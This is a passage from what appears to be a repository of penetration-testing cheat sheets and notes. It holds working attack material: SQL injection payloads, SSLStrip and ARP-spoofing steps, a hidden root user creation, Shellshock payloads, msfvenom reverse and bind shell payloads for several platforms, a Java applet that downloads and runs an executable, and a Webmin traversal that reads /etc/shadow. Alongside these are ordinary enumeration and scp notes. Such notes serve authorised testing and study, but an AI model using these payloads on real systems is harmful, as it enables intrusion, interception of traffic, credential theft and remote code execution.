version(),2# 8 | 9 | 1' UNION SELECT version(),database()# 10 | 11 | 1' UNION SELECT version(),user()# 12 | 13 | 1' UNION ALL SELECT table_name,2 from information_schema.tables# 14 | 15 | 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 16 | 17 | 1' UNION ALL SELECT concat(user,char(58),password),2 from users# 18 | 19 | 20 | sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL 
--os=Linux --banner --is-dba --users --passwords --current-user --dbs -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SSLStrip.txt: -------------------------------------------------------------------------------- 1 | 1) Flip your machine into forwarding mode (as root): 2 | echo "1" > /proc/sys/net/ipv4/ip_forward 3 | 4 | 2) Setup iptables to intercept HTTP requests (as root): 5 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 6 | 7 | 3) sslstip.py -l 8080 -f lock.ico 8 | 9 | 4) Run arpspoof to redirect traffic to your machine (as root): 10 | arpspoof -i -t -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Solaris.txt: -------------------------------------------------------------------------------- 1 | [+] Solaris vulnerabilities: 2 | 3 | Solaris 7: 4 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 5 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 6 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 7 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 8 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root 9 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 10 | 11 | Solaris 8: 12 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 13 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 14 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 15 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 16 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 17 | no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 
18 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 19 | 20 | solaris 9: 21 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 22 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 23 | sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 24 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 25 | 26 | Solaris 10: 27 | fuser TELNET - authentication bypass through -f command - can be manually exploited 28 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 29 | 30 | Solaris 11: 31 | fuser TELNET - authentication bypass through -f command - can be manually exploited 32 | 33 | [+] Adding solaris user: 34 | 35 | useradd -u 0 -o pentestuser 36 | passwd -d pentestuser 37 | 38 | [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Tools.txt: -------------------------------------------------------------------------------- 1 | Browser Addons 2 | -------------- 3 | 4 | - Chrome: 5 | 6 | Recx Security Analyser 7 | Wappalyzer 8 | 9 | - Firefox/Iceweasel: 10 | 11 | Web Developer 12 | Tamper Data 13 | FoxyProxy Standard 14 | User Agent Switcher 15 | PassiveRecon 16 | Wappalyzer 17 | Firebug 18 | HackBar -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_UsefulCommands.txt: -------------------------------------------------------------------------------- 1 | Useful commands 2 | --------------- 3 | 4 | [+] Remove text using sed 5 | 6 | cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g' 7 | 8 | [+] Port forwarding using NCAT 9 | 10 | ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443" 11 | 12 | [+] Windows 7 or later, build port relay 13 | 14 | C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= 
connectaddress= 15 | 16 | [+] Grab HTTP Headers 17 | 18 | curl -LIN 19 | 20 | [+] Quickly generate an MD5 hash for a text string using OpenSSL 21 | 22 | echo -n 'text to be encrypted' | openssl md5 23 | 24 | [+] Shutdown a Windows machine from Linux 25 | 26 | net rpc shutdown -I ipAddressOfWindowsPC -U username%password 27 | 28 | [+] Conficker Detection with NMAP 29 | 30 | nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES 31 | 32 | [+] Determine if a port is open with bash 33 | 34 | (: /dev/null && echo "OPEN" || echo "CLOSED" -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Vlans.txt: -------------------------------------------------------------------------------- 1 | Configure an Ethernet interface as a VLAN trunk 2 | --------------------------------------------------- 3 | 4 | Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3. 5 | 6 | [+] First install the vlan package if it is not already present: 7 | 8 | apt-get install vlan 9 | 10 | [+] Turn off network-manager 11 | 12 | sudo stop network-manager 13 | 14 | [+] Configuring interfaces 15 | 16 | vconfig add eth0 (you may get a warning message on the first one) 17 | example: vconfig add eth0 101 18 | 19 | ifconfig eth0. /24 up 20 | example: ifconfig eth0.101 192.168.1.10/24 up 21 | 22 | ifconfig eth0. 23 | 24 | Note: If any issues run, ifconfig eth0 0.0.0.0 up 25 | Note: Specify interface with nmap scanning (nmap -e eth0.101) 26 | Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. 
(route add) 27 | 28 | [+] Remove Configuration 29 | vconfig rem eth0.101 30 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_VulnVerify.txt: -------------------------------------------------------------------------------- 1 | Verify Various Vulnerabilities 2 | ------------------------------ 3 | 4 | [+] IPMI Cipher Suite Zero Authentication Bypass: 5 | http://www.tenable.com/plugins/index.php?view=single&id=68931 6 | 7 | Tools required: 8 | ipmitool 9 | freeipmi-tools 10 | 11 | ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list 12 | 13 | # Specifying Cipher Suite Zero 14 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list 15 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status 16 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help 17 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell 18 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor 19 | 20 | 21 | [+] Bash Remote Code Execution (Shellshock) 22 | http://www.tenable.com/plugins/index.php?view=single&id=77823 23 | 24 | x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt 25 | x: () { :;}; echo "Hacked" > /var/www/hacked.html 26 | 27 | 28 | [+] DNS Server Cache Snooping Remote Information Disclosure 29 | http://www.tenable.com/plugins/index.php?view=single&id=12217 30 | 31 | Nmap Script: dns-cache-snoop 32 | http://nmap.org/nsedoc/scripts/dns-cache-snoop.html 33 | 34 | nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' 35 | 36 | 37 | [+] IP Forwarding Enabled 38 | http://www.tenable.com/plugins/index.php?view=single&id=50686 39 | 40 | Nmap Script: ip-forwarding 41 | http://nmap.org/nsedoc/scripts/ip-forwarding.html 42 | 43 | sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com' 44 
| 45 | Alternatives: 46 | - Set VM's default gateway as the victim IP address and attempt to route elsewhere. 47 | - http://pentestmonkey.net/tools/gateway-finder 48 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_WindowsCommandLine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_WindowsCommandLine.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_scp.txt: -------------------------------------------------------------------------------- 1 | [+] Secure Copy (scp) Cheatsheet 2 | -------------------------------- 3 | 4 | [>] Copy remote file to local host: 5 | 6 | $ scp your_username@192.168.0.10: /some/local/directory 7 | 8 | [>] Copy local file to remote host: 9 | 10 | $ scp your_username@192.168.0.10:/some/remote/directory 11 | 12 | [>] Copy local directory to remote directory: 13 | 14 | scp -r your_username@192.168.0.10:/some/remote/directory/ 15 | 16 | [>] Copy a file from one remote host to another: 17 | 18 | scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ 19 | 20 | [>] Improve scp performance (use blowfish; note that current OpenSSH releases no longer ship the blowfish cipher, so this only works against legacy servers — run `ssh -Q cipher` to see what your client offers): 21 | 22 | scp -c blowfish your_username@192.168.0.10:/some/remote/directory -------------------------------------------------------------------------------- /cheatSheets/beginners_python_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/beginners_python_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/complexity_cheatsheet.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/complexity_cheatsheet.pdf -------------------------------------------------------------------------------- /cheatSheets/egghead-react-cheat-sheet-0-14-7.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/egghead-react-cheat-sheet-0-14-7.pdf -------------------------------------------------------------------------------- /cheatSheets/egghead-redux-cheat-sheet-3-2-1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/egghead-redux-cheat-sheet-3-2-1.pdf -------------------------------------------------------------------------------- /cheatSheets/emmet_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/emmet_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/html5_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/html5_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/jquery_cheat_sheet_1.3.2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/jquery_cheat_sheet_1.3.2.pdf -------------------------------------------------------------------------------- /cheatSheets/reverse_shell_with_msfvenom.txt: 
-------------------------------------------------------------------------------- 1 | ## Reverse Shell with Msfvenom - Cheatsheet 2 | 3 | ### List payloads 4 | 5 | {% highlight Shell %} 6 | 7 | ```Shell 8 | 9 | msfvenom -l 10 | ``` 11 | 12 | {% endhighlight %} 13 | 14 | Or 15 | 16 | {% highlight Shell %} 17 | 18 | ```Shell 19 | 20 | msfvenom --list payloads 21 | ``` 22 | 23 | {% endhighlight %} 24 | 25 | ### Generate a PHP payload 26 | 27 | {% highlight Shell %} 28 | 29 | ```Shell 30 | 31 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 32 | ``` 33 | 34 | {% endhighlight %} 35 | 36 | ### Generate a Windows payload 37 | 38 | ##### Meterpreter - Reverse shell (x64): 39 | 40 | {% highlight Shell %} 41 | 42 | ```Shell 43 | 44 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 45 | ``` 46 | 47 | {% endhighlight %} 48 | 49 | ##### Meterpreter - Reverse shell: 50 | 51 | {% highlight Shell %} 52 | 53 | ```Shell 54 | 55 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 56 | ``` 57 | 58 | {% endhighlight %} 59 | 60 | ##### Meterpreter - Bind shell: 61 | 62 | {% highlight Shell %} 63 | 64 | ```Shell 65 | 66 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe 67 | ``` 68 | 69 | {% endhighlight %} 70 | 71 | ##### CMD - Reverse shell: 72 | 73 | {% highlight Shell %} 74 | 75 | ```Shell 76 | 77 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe 78 | ``` 79 | 80 | {% endhighlight %} 81 | 82 | ### Generate a Linux payload 83 | 84 | ##### Meterpreter - Reverse shell: 85 | 86 | {% highlight Shell %} 87 | 88 | ```Shell 89 | 90 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin 91 | ``` 92 | 93 | {% endhighlight %} 94 | 95 | ### Generate a Python payload 96 | 97 | {% highlight Shell %} 98 | 99 | ```Shell 100 | 101 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py 102 | ``` 103 | 104 | {% endhighlight 
%} 105 | 106 | ### Generate a WAR payload 107 | 108 | {% highlight Shell %} 109 | 110 | ```Shell 111 | 112 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war 113 | ``` 114 | 115 | {% endhighlight %} 116 | 117 | ### Generate an ASP payload 118 | 119 | {% highlight Shell %} 120 | 121 | ```Shell 122 | 123 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp 124 | ``` 125 | 126 | {% endhighlight %} 127 | 128 | ### Generate encoded payloads 129 | 130 | ##### Shikata\_ga\_nai 131 | 132 | {% highlight Shell %} 133 | 134 | ```Shell 135 | 136 | msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse 137 | ``` 138 | 139 | {% endhighlight %} 140 | -------------------------------------------------------------------------------- /cheatSheets/sass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/sass.png -------------------------------------------------------------------------------- /cheatSheets/sass_functions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/sass_functions.pdf -------------------------------------------------------------------------------- /client_side/signed_applet.java: -------------------------------------------------------------------------------- 1 | /** 2 | * This applet will download a file and execute it 3 | **/ 4 | 5 | import java.applet.*; 6 | import java.awt.*; 7 | import java.io.*; 8 | import java.net.URL; 9 | import java.util.*; 10 | 11 | public class Java extends Applet 12 | { 13 | private Object initialized = null; 14 | public Object isInitialized() 15 | { 16 | return initailized; 17 | } 18 | 19 | public void init() 20 | { 21 | Process f; 22 | try 23 | { 24 | String tmpdir = 
System.getProperty("java.io.tmpdir") + File.separator; 25 | String expath = tmpdir + "applet.exe"; 26 | String download = ""; 27 | download = getParameter("1"); 28 | if (download.length() > 0) 29 | { 30 | // URL Parameter 31 | URL url = new URL(download); 32 | // Get an input stream for reading 33 | InputStream in = url.openStream(); 34 | // Create a buffered input stream for efficiency 35 | BufferedInputStream bufIn = new BufferedInputStream(in); 36 | File outputFile = new File(expath); 37 | OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile)); 38 | byte[] buffer = new byte[2048]; 39 | for (;;) 40 | { 41 | int nBytes = bufIn.read(buffer); 42 | if (nBytes <= 0) break; 43 | out.write(buffer, 0, nBytes); 44 | } 45 | out.flush(); 46 | out.close(); 47 | in.close(); 48 | // Execute downloaded file 49 | f = Runtime.getRuntime().exec("cmd.exe /c " + expath); 50 | } 51 | } catch(IOException e) { 52 | e.printStackTrace(); 53 | } catch(Exception exception) { 54 | exception.printStackTrace(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /crypto/Crypto101.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/crypto/Crypto101.pdf -------------------------------------------------------------------------------- /enumeration/dns_enumeration.md: -------------------------------------------------------------------------------- 1 | # DNS Enumeration 2 | 3 | - NMAP DNS Hostnames Lookup 4 | 5 | ```ShellSession 6 | nmap -F --dns-server 7 | ``` 8 | 9 | - Host Lookup 10 | 11 | ```ShellSession 12 | host -t ns [megacorpone.com](http://megacorpone.com/) 13 | ``` 14 | 15 | - Reverse Lookup Brute Force - find domains in the same range 16 | 17 | ```ShellSession 18 | for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found" 19 | ``` 20 | 21 | - Perform DNS IP Lookup 22 
| 23 | ```ShellSession 24 | dig a [domain-name-here.com](http://domain-name-here.com/) @nameserver 25 | ``` 26 | 27 | - Perform MX Record Lookup 28 | 29 | ```ShellSession 30 | dig mx [domain-name-here.com](http://domain-name-here.com/) @nameserver 31 | ``` 32 | 33 | - Perform Zone Transfer with DIG 34 | 35 | ```ShellSession 36 | dig axfr [domain-name-here.com](http://domain-name-here.com/) @nameserver 37 | ``` 38 | 39 | ## DNS Zone Transfers 40 | 41 | - Windows DNS zone transfer 42 | 43 | ```ShellSession 44 | nslookup -> set type=any -> ls -d [blah.com  ](http://blah.com/) 45 | ``` 46 | 47 | - Linux DNS zone transfer 48 | 49 | ```ShellSession 50 | dig axfr [blah.com](http://blah.com/) @[ns1.blah.com](http://ns1.blah.com/) 51 | ``` 52 | 53 | - Dnsrecon DNS Brute Force 54 | 55 | ```ShellSession 56 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 57 | ``` 58 | 59 | - Dnsrecon DNS List of megacorp 60 | 61 | ```ShellSession 62 | dnsrecon -d [megacorpone.com](http://megacorpone.com/) -t axfr 63 | ``` 64 | 65 | - DNSEnum 66 | 67 | ```ShellSession 68 | dnsenum zonetransfer.m 69 | ``` 70 | -------------------------------------------------------------------------------- /enumeration/file_enumeration.md: -------------------------------------------------------------------------------- 1 | # File Enumeration 2 | 3 | - Find UID 0 files root execution 4 | 5 | ```ShellSession 6 | /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\\\; 2>/dev/null 7 | ``` 8 | 9 | - Get handy linux file system enumeration script (/var/tmp) 10 | 11 | ```ShellSession 12 | wget 13 | 14 | chmod +x ./linux-local-enum.sh 15 | 16 | ./linux-local-enum.sh 17 | ``` 18 | 19 | - Find executable files updated in August 20 | 21 | ```ShellSession 22 | find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug 23 | ``` 24 | 25 | - Find a specific file on linux 26 | 27 | ```ShellSession 28 | find /. 
-name suid\\\*\\ 29 | ``` 30 | 31 | - Find all the strings in a file 32 | 33 | ```ShellSession 34 | strings 35 | ``` 36 | 37 | - Determine the type of a file 38 | 39 | ```ShellSession 40 | file 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /enumeration/http_enumeration.md: -------------------------------------------------------------------------------- 1 | # HTTP Enumeration 2 | 3 | - Search for folders with gobuster: 4 | 5 | ```ShellSession 6 | gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip 7 | ``` 8 | 9 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file 10 | 11 | - Dirb - Directory brute force finding using a dictionary file 12 | 13 | ```ShellSession 14 | dirb http://$ip/ wordlist.dict 15 | 16 | dirb <> 17 | ``` 18 | 19 | - Dirb against a proxy 20 | 21 | ```ShellSession 22 | dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129 23 | ``` 24 | 25 | - Nikto 26 | 27 | ```ShellSession 28 | nikto -h $ip 29 | ``` 30 | 31 | - [HTTP Enumeration](#http-enumeration) 32 | 33 | ```ShellSession 34 | nmap --script=http-enum -p80 -n $ip/24 35 | ``` 36 | 37 | - Nmap Check the server methods 38 | 39 | ```ShellSession 40 | nmap --script http-methods --script-args http-methods.url-path='/test' $ip 41 | ``` 42 | 43 | - Get Options available from web server 44 | 45 | ```ShellSession 46 |   curl -vX OPTIONS vm/test 47 | ``` 48 | 49 | - Uniscan directory finder: 50 | 51 | ```ShellSession 52 | uniscan -qweds -u <> 53 | ``` 54 | 55 | - Wfuzz - The web brute forcer 56 | 57 | ```ShellSession 58 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 59 | 60 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 61 | 62 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 63 | 64 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 65 | ``` 66 | 67 | - Recurse level 3 68 | 
69 | ```ShellSession 70 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 71 | ``` 72 | 73 | - Open a service using a port knock (Secured with Knockd) 74 | 75 | ```ShellSession 76 | for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 -max-retries 0 -p $x server_ip_address; done 77 | ``` 78 | 79 | - WordPress Scan - Wordpress security scanner 80 | 81 | ```ShellSession 82 | wpscan --url $ip/blog --proxy $ip:3129 83 | ``` 84 | 85 | - RSH Enumeration - Unencrypted file transfer system 86 | 87 | ```ShellSession 88 | auxiliary/scanner/rservices/rsh_login 89 | ``` 90 | 91 | - Finger Enumeration 92 | 93 | ```ShellSession 94 | finger @$ip 95 | 96 | finger batman@$ip 97 | ``` 98 | 99 | - TLS & SSL Testing 100 | 101 | ```ShellSession 102 | ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html 103 | ``` 104 | 105 | - Proxy Enumeration (useful for open proxies) 106 | 107 | ```ShellSession 108 | nikto -useproxy http://$ip:3128 -h $ip 109 | ``` 110 | 111 | - Steganography 112 | 113 | ```ShellSession 114 | > apt-get install steghide 115 | 116 | > steghide extract -sf picture.jpg 117 | 118 | > steghide info picture.jpg 119 | 120 | > apt-get install stegosuite 121 | ``` 122 | 123 | - The OpenVAS Vulnerability Scanner 124 | 125 | ```ShellSession 126 | apt-get update 127 | 128 | apt-get install openvas 129 | 130 | openvas-setup 131 | 132 | netstat -tulpn 133 | 134 | Login at: https://$ip:939 135 | ``` 136 | -------------------------------------------------------------------------------- /enumeration/miniserv_webmin_enumeration.md: -------------------------------------------------------------------------------- 1 | # Miniserv and webmin Enumeration 2 | 3 | ## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd 4 | 5 | ```ShellSession 6 | curl 
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 7 | ``` 8 | 9 | ## Test to see if webmin is running as root by grabbing /etc/shadow 10 | 11 | ```ShellSession 12 | curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow 13 | ``` 14 | -------------------------------------------------------------------------------- /enumeration/ms_sql_server_enumeration.md: -------------------------------------------------------------------------------- 1 | # MS SQL Server Enumeration 2 | 3 | - Nmap Information Gathering 4 | 5 | ```ShellSession 6 | nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes    --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip 7 | ``` 8 | -------------------------------------------------------------------------------- /enumeration/nfs_enumeration.md: -------------------------------------------------------------------------------- 1 | # NFS_Enumeration (Network File System).html 2 | 3 | - Show Mountable NFS Shares 4 | 5 | ```ShellSession 6 | nmap -sV --script=nfs-showmount $ip 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /enumeration/osint_recon_ng.md: -------------------------------------------------------------------------------- 1 | # OSINT By recon-ng 2 | 3 | ## Study case (trivago.com) 4 | 5 | ```Bash 6 | > recon-ng 7 | 8 | ## now let's add a workspace 9 | > workspaces 
add trivago.com 10 | 11 | ## Add the target domain 12 | > add domains trivago.com 13 | 14 | ## Double check if domain is added 15 | > show domains 16 | 17 | ## find related hosts to our domain 18 | > load netcraft 19 | > run 20 | 21 | ## check added hosts 22 | > show hosts 23 | 24 | ## Searching web 25 | > load google 26 | > load google_site_web 27 | > run 28 | 29 | ## Now it's time for brute-forcing 30 | > load brute 31 | > load brute_hosts 32 | > run 33 | 34 | ## resolve hosts 35 | > load resolve 36 | > run 37 | 38 | ## now reverse resolve 39 | > load reverse_resolve 40 | > use recon/hosts-hosts/reverse_resolve 41 | > run 42 | 43 | ## check hosts 44 | > show hosts 45 | 46 | ## Now let's get some geolocation info 47 | > load ipinfodb 48 | > run 49 | 50 | ## more geolocation info 51 | 52 | ### first edit /usr/local/Cellar/recon-ng/4.9.2/libexec/modules/recon/locations-locations/geocode.py 53 | ### also edit /usr/local/Cellar/recon-ng/4.9.2/libexec/modules/recon/locations-locations/reverse_geocode.py 54 | ### line 21 instead of `return` make it `continue` 55 | 56 | > load geocode 57 | > use recon/locations-locations/geocode 58 | 59 | > show options 60 | > show info 61 | > set SOURCE query SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL 62 | > run 63 | 64 | ## Check locations 65 | > show locations 66 | 67 | ## Now reverse 68 | > load reverse 69 | > use recon/locations-locations/reverse_geocode 70 | > run 71 | 72 | ## Check locations 73 | > show locations 74 | 75 | ## Now let's change reverse_geocode query to run on hosts table 76 | > show info 77 | > set SOURCE query SELECT DISTINCT latitude || ',' || longitude FROM hosts WHERE latitude IS NOT NULL AND longitude IS NOT NULL 78 | > run 79 | 80 | ## Check locations 81 | > show locations 82 | 83 | ## now let's search contacts 84 | > search contacts 85 | > use recon/domains-contacts/whois_pocs 86 | > run 87 | 88 | > load pgp_search 89 | > run 90 | 91 | ## After you found some contacts, now let's see if there is 
any leaks for them 92 | > use recon/contacts-credentials/hibp_paste 93 | > run 94 | 95 | ## Now let's find some interesting files on the servers 96 | > use discovery/info_disclosure/interesting_files 97 | > run 98 | 99 | ``` 100 | 101 | https://github.com/jhaddix/domain 102 | -------------------------------------------------------------------------------- /enumeration/pop3_enumeration.md: -------------------------------------------------------------------------------- 1 | # POP3 Enumeration 2 | 3 | ## Reading other peoples mail 4 | 5 | You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet 6 | 7 | ```ShellSession 8 | root@kali:~# telnet $ip 110 9 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 10 | USER billydean 11 | +OK 12 | PASS password 13 | +OK Welcome billydean 14 | 15 | list 16 | 17 | +OK 2 1807 18 | 1 786 19 | 2 1021 20 | 21 | retr 1 22 | 23 | +OK Message follows 24 | From: jamesbrown@motown.com 25 | Dear Billy Dean, 26 | 27 | Here is your login for remote desktop ... try not to forget it this time! 
28 | username: billydean 29 | password: PA$$W0RD!Z 30 | ``` 31 | -------------------------------------------------------------------------------- /enumeration/rpc_enumeration.md: -------------------------------------------------------------------------------- 1 | # RPC Enumeration (Remote Procedure Call) 2 | 3 | ## Connect to an RPC share without a username and password and enumerate privileges 4 | 5 | ```ShellSession 6 | rpcclient --user="" --command=enumprivs -N $ip 7 | ``` 8 | 9 | ## Connect to an RPC share with a username and enumerate privileges 10 | 11 | ```ShellSession 12 | rpcclient --user="" --command=enumprivs $ip 13 | ``` 14 | -------------------------------------------------------------------------------- /enumeration/smtp_enumeration.md: -------------------------------------------------------------------------------- 1 | # SMTP Enumeration (Simple Mail Transfer Protocol) 2 | 3 | ```ShellSession 4 | root@kali:~# nc -nv 192.168.1.12 25 5 | (UNKNOWN) [192.168.1.12] 25 (smtp) open 6 | 220 WIN-3UR24XX66QZ Microsoft ESMTP MAIL Service, Version: 7.0.6001.18000 ready at Thu, 4 Jan 2018 11:48:35 +0200 7 | ``` 8 | -------------------------------------------------------------------------------- /enumeration/snmb_enumeration.md: -------------------------------------------------------------------------------- 1 | # SNMP Enumeration (Simple Network Management Protocol) 2 | 3 | ## Fix SNMP output values so they are human readable 4 | 5 | ```ShellSession 6 | apt-get install snmp-mibs-downloader download-mibs 7 | echo "" > /etc/snmp/snmp.conf 8 | ``` 9 | 10 | ## Scanning for SNMP 11 | 12 | ### Using nmap 13 | 14 | ```ShellSession 15 | root@kali:~# nmap -sU -v --open -p 161 192.168.1.12 16 | Note: SNMP is using UDP not TCP 17 | ``` 18 | 19 | ### Using onesixtyone 20 | 21 | ```ShellSession 22 | root@kali:~# echo public > /tmp/community.txt 23 | root@kali:~# echo private >> /tmp/community.txt 24 | root@kali:~# echo manager >> /tmp/community.txt 25 | root@kali:~# echo 
